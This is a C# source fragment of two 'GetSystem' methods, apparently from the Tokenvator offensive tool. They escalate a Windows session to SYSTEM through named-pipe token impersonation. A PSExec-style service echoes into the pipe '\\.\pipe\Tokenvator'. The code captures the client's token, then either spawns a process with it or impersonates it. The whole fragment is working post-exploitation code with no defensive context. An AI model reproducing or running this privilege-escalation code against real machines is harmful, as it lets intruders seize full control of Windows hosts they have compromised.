////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
internal static void GetSystem(String command, String arguments)
{
Thread thread = new Thread(() => _GetPipeToken(@"\\.\pipe\Tokenvator"));
using (PSExec psExec = new PSExec("Tokenvator"))
{
psExec.Connect(".");
psExec.Create("%COMSPEC% /c echo tokenvator > \\\\.\\pipe\\Tokenvator");
psExec.Open();
thread.Start();
waitHandle.WaitOne();
psExec.Start();
psExec.Stop();
}
thread.Join();
Create createProcess;
if (0 == System.Diagnostics.Process.GetCurrentProcess().SessionId)
{
createProcess = CreateProcess.CreateProcessWithLogonW;
}
else
{
createProcess = CreateProcess.CreateProcessWithTokenW;
}
createProcess(hToken, command, arguments);
}
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
internal static void GetSystem()
{
Thread thread = new Thread(() => _GetPipeToken(@"\\.\pipe\Tokenvator"));
using (PSExec psExec = new PSExec("Tokenvator"))
{
psExec.Connect(".");
psExec.Create("%COMSPEC% /c echo tokenvator > \\\\.\\pipe\\Tokenvator");
psExec.Open();
thread.Start();
waitHandle.WaitOne();
psExec.Start();
psExec.Stop();
}
thread.Join();
if (IntPtr.Zero != hToken)
{
advapi32.ImpersonateLoggedOnUser(hToken);
kernel32.CloseHandle(hToken);
Console.WriteLine("[+] Operating as {0}", System.Security.Principal.WindowsIdentity.GetCurrent().Name);
hToken = IntPtr.Zero;
}
}
